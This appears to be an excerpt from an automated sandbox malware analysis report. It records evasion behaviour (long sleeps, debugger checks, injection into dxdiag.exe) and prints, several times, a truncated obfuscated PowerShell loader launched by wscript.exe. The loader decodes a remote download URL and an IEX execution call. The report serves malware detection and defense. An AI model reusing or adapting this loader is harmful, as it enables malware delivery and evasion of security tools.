                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\dxdiag.exeAPI/Special instruction interceptor: Address: 41036E8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5448Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4463Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7137Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2345Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeWindow / User API: threadDelayed 3696Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 8120Thread sleep count: 3696 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5916Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exeThread sleep count: Count: 3696 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000008.00000002.1468130265.000001AB7B270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBo
                Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_02F022ED LdrInitializeThunk,25_2_02F022ED

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_7364.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2F00000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2ECFAF4Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$FogJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#inartistical turkisen reenforcement #>;$hollingsworth='tffelheltene';<#niveaudelen ufordjeligheds initiativriges honourarily husbukkens #>;$husspildevandet=$host.privatedata;if ($husspildevandet) {$antoecians++;}function dioptres($unjoint){$curvograph=$repolarized+$unjoint.length-$antoecians;for( $aftest=5;$aftest -lt $curvograph;$aftest+=6){$injoint+=$unjoint[$aftest];}$injoint;}function unhandled($gaggling){ . ($reprsenterende) ($gaggling);}$phoronomy=dioptres 'nitromint,mobergazs,nneiu derlkommalmat iamac.o/ star5agend.korpu0p rfo sinds(la.oowreacci sklennringdbaandoroun.wgrundsvirke alpegnunde tsnoha l,gen1tekno0 mass.p.rdo0tolkd;insuf fertw twinifldern murp6 skel4trans;sygem astox fo h6dal e4agers;.hili naz erprotevsu.er:cog i1s aak2vask.1p ani. ambu0their)sunny shelgridseeurfjecfolkekmaddio en,e/wheel2uncli0ko ce1skide0prebl0zo ia1firma0benz.1a kom fimreffahreidecidrdriftewind fstrudo,geerxud.ul/bo,ca1optra2 li h1bortk.skaml0 sejr ';$jordskorpens=dioptres 'ph nougy sus ba eeragger beha-flubbablowog out eduodenapo.ttdefin ';$patienternes=dioptres ' osetherhvetmora.tcoccopfibrasndlgn:mi ti/ elys/sk.ggddiu nrbag jipre evudfale knub.im.ergstiloo fraaohtt nglegeml e ekesolit.sparpccreamosalgsm wind/ frdiusi etcnavne?kni aeindspxsacchpectoboskat,rk nklt thon=slenddobli.ochirkwcrassnlbeselglasso b gnatopkodenang& progiudskidpluvi=orthi1 seizeturk 2varmt2tankrha rcastrknidcucu.r nelif anrglimplasherpeprubrilregiotd.scihsuppomuforfhcorr,emac r9acco.wtyggejtajiku erebg gorgqdyrticgiese-intertlagomb hist9unvexamymarxhjtekjarinblinter ';$dispowder=dioptres 'ruteb> turo ';$reprsenterende=dioptres 'v aleitoldke varmxeq,al ';$bytrafik='konfektionerings';$peninvariant='\tallowweed.kli';unhandled (dioptres 'pneum$predigpe tal onio kompbaboliasammelconca:nattegor.ngeriftmnstr,bd filaih ndsgsub etenchae aurnengrod ybeefishi=fae y$c ipse h frnassumvomb g: extra ignppan rptro jd wis a helbt kk,eabehnd+ onse$houghpmiosie.ruppnseminisilvan rimevaffe amyxoprsilicigl.vearntgenmadoqtbienn ');unhandled (dioptres ' ale$urstrgsanitls kkeo phavbscriba anaclamt g:endursbinyrtfanera frafni oeddnipp s frere anadsca ae ryde=mu ke$ scatpthievahypogtflippigoneneberennquadrtsetopeviridrexcavncylineerotisunhu . ne bsc.rcepcorralov rdifo,est alko(pa.ro$ravindc,regiseps s slidpdr,bbospaltw ,arrdorganeba ysrunder)torch ');unhandled (dioptres 'cross[fourinhalvdenonvat duk,.demulsb,sieemediar fllevsweetiosmanccoe.dece,toplyxosoincooiskiffndrg.ttnedslmattaca bolinnonteachondgsaussepirrervrvle]likvi:germa:plejessa ine pentcaar,tuseks,rhjernikirketa atryvaroopshamarringroembrotbestsop,ckpcsikk.okl,mrl slu unad= lin f rsy[pajamnsandbenrceitaberr. aviss unquekongecfiliouforfarbes,ai asset sen ycoanipforwarulykkobubbetenkesok.strc kopvoin.eslgang ttransytha.mp drate stam]c ron: encl:am sit,indblkonkusladn.1shops2 teat ');$patienternes=$standsede[0];$fog
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#inartistical turkisen reenforcement #>;$hollingsworth='tffelheltene';<#niveaudelen ufordjeligheds initiativriges honourarily husbukkens #>;$husspildevandet=$host.privatedata;if ($husspildevandet) {$antoecians++;}function dioptres($unjoint){$curvograph=$repolarized+$unjoint.length-$antoecians;for( $aftest=5;$aftest -lt $curvograph;$aftest+=6){$injoint+=$unjoint[$aftest];}$injoint;}function unhandled($gaggling){ . ($reprsenterende) ($gaggling);}$phoronomy=dioptres 'nitromint,mobergazs,nneiu derlkommalmat iamac.o/ star5agend.korpu0p rfo sinds(la.oowreacci sklennringdbaandoroun.wgrundsvirke alpegnunde tsnoha l,gen1tekno0 mass.p.rdo0tolkd;insuf fertw twinifldern murp6 skel4trans;sygem astox fo h6dal e4agers;.hili naz erprotevsu.er:cog i1s aak2vask.1p ani. ambu0their)sunny shelgridseeurfjecfolkekmaddio en,e/wheel2uncli0ko ce1skide0prebl0zo ia1firma0benz.1a kom fimreffahreidecidrdriftewind fstrudo,geerxud.ul/bo,ca1optra2 li h1bortk.skaml0 sejr ';$jordskorpens=dioptres 'ph nougy sus ba eeragger beha-flubbablowog out eduodenapo.ttdefin ';$patienternes=dioptres ' osetherhvetmora.tcoccopfibrasndlgn:mi ti/ elys/sk.ggddiu nrbag jipre evudfale knub.im.ergstiloo fraaohtt nglegeml e ekesolit.sparpccreamosalgsm wind/ frdiusi etcnavne?kni aeindspxsacchpectoboskat,rk nklt thon=slenddobli.ochirkwcrassnlbeselglasso b gnatopkodenang& progiudskidpluvi=orthi1 seizeturk 2varmt2tankrha rcastrknidcucu.r nelif anrglimplasherpeprubrilregiotd.scihsuppomuforfhcorr,emac r9acco.wtyggejtajiku erebg gorgqdyrticgiese-intertlagomb hist9unvexamymarxhjtekjarinblinter ';$dispowder=dioptres 'ruteb> turo ';$reprsenterende=dioptres 'v aleitoldke varmxeq,al ';$bytrafik='konfektionerings';$peninvariant='\tallowweed.kli';unhandled (dioptres 'pneum$predigpe tal onio kompbaboliasammelconca:nattegor.ngeriftmnstr,bd filaih ndsgsub etenchae aurnengrod ybeefishi=fae y$c ipse h frnassumvomb g: extra ignppan rptro jd wis a helbt kk,eabehnd+ onse$houghpmiosie.ruppnseminisilvan rimevaffe amyxoprsilicigl.vearntgenmadoqtbienn ');unhandled (dioptres ' ale$urstrgsanitls kkeo phavbscriba anaclamt g:endursbinyrtfanera frafni oeddnipp s frere anadsca ae ryde=mu ke$ scatpthievahypogtflippigoneneberennquadrtsetopeviridrexcavncylineerotisunhu . ne bsc.rcepcorralov rdifo,est alko(pa.ro$ravindc,regiseps s slidpdr,bbospaltw ,arrdorganeba ysrunder)torch ');unhandled (dioptres 'cross[fourinhalvdenonvat duk,.demulsb,sieemediar fllevsweetiosmanccoe.dece,toplyxosoincooiskiffndrg.ttnedslmattaca bolinnonteachondgsaussepirrervrvle]likvi:germa:plejessa ine pentcaar,tuseks,rhjernikirketa atryvaroopshamarringroembrotbestsop,ckpcsikk.okl,mrl slu unad= lin f rsy[pajamnsandbenrceitaberr. aviss unquekongecfiliouforfarbes,ai asset sen ycoanipforwarulykkobubbetenkesok.strc kopvoin.eslgang ttransytha.mp drate stam]c ron: encl:am sit,indblkonkusladn.1shops2 teat ');$patienternes=$standsede[0];$fog
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#inartistical turkisen reenforcement #>;$hollingsworth='tffelheltene';<#niveaudelen ufordjeligheds initiativriges honourarily husbukkens #>;$husspildevandet=$host.privatedata;if ($husspildevandet) {$antoecians++;}function dioptres($unjoint){$curvograph=$repolarized+$unjoint.length-$antoecians;for( $aftest=5;$aftest -lt $curvograph;$aftest+=6){$injoint+=$unjoint[$aftest];}$injoint;}function unhandled($gaggling){ . ($reprsenterende) ($gaggling);}$phoronomy=dioptres 'nitromint,mobergazs,nneiu derlkommalmat iamac.o/ star5agend.korpu0p rfo sinds(la.oowreacci sklennringdbaandoroun.wgrundsvirke alpegnunde tsnoha l,gen1tekno0 mass.p.rdo0tolkd;insuf fertw twinifldern murp6 skel4trans;sygem astox fo h6dal e4agers;.hili naz erprotevsu.er:cog i1s aak2vask.1p ani. ambu0their)sunny shelgridseeurfjecfolkekmaddio en,e/wheel2uncli0ko ce1skide0prebl0zo ia1firma0benz.1a kom fimreffahreidecidrdriftewind fstrudo,geerxud.ul/bo,ca1optra2 li h1bortk.skaml0 sejr ';$jordskorpens=dioptres 'ph nougy sus ba eeragger beha-flubbablowog out eduodenapo.ttdefin ';$patienternes=dioptres ' osetherhvetmora.tcoccopfibrasndlgn:mi ti/ elys/sk.ggddiu nrbag jipre evudfale knub.im.ergstiloo fraaohtt nglegeml e ekesolit.sparpccreamosalgsm wind/ frdiusi etcnavne?kni aeindspxsacchpectoboskat,rk nklt thon=slenddobli.ochirkwcrassnlbeselglasso b gnatopkodenang& progiudskidpluvi=orthi1 seizeturk 2varmt2tankrha rcastrknidcucu.r nelif anrglimplasherpeprubrilregiotd.scihsuppomuforfhcorr,emac r9acco.wtyggejtajiku erebg gorgqdyrticgiese-intertlagomb hist9unvexamymarxhjtekjarinblinter ';$dispowder=dioptres 'ruteb> turo ';$reprsenterende=dioptres 'v aleitoldke varmxeq,al ';$bytrafik='konfektionerings';$peninvariant='\tallowweed.kli';unhandled (dioptres 'pneum$predigpe tal onio kompbaboliasammelconca:nattegor.ngeriftmnstr,bd filaih ndsgsub etenchae aurnengrod ybeefishi=fae y$c ipse h frnassumvomb g: extra ignppan rptro jd wis a helbt kk,eabehnd+ onse$houghpmiosie.ruppnseminisilvan rimevaffe amyxoprsilicigl.vearntgenmadoqtbienn ');unhandled (dioptres ' ale$urstrgsanitls kkeo phavbscriba anaclamt g:endursbinyrtfanera frafni oeddnipp s frere anadsca ae ryde=mu ke$ scatpthievahypogtflippigoneneberennquadrtsetopeviridrexcavncylineerotisunhu . ne bsc.rcepcorralov rdifo,est alko(pa.ro$ravindc,regiseps s slidpdr,bbospaltw ,arrdorganeba ysrunder)torch ');unhandled (dioptres 'cross[fourinhalvdenonvat duk,.demulsb,sieemediar fllevsweetiosmanccoe.dece,toplyxosoincooiskiffndrg.ttnedslmattaca bolinnonteachondgsaussepirrervrvle]likvi:germa:plejessa ine pentcaar,tuseks,rhjernikirketa atryvaroopshamarringroembrotbestsop,ckpcsikk.okl,mrl slu unad= lin f rsy[pajamnsandbenrceitaberr. aviss unquekongecfiliouforfarbes,ai asset sen ycoanipforwarulykkobubbetenkesok.strc kopvoin.eslgang ttransytha.mp drate stam]c ron: encl:am sit,indblkonkusladn.1shops2 teat ');$patienternes=$standsede[0];$fogJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
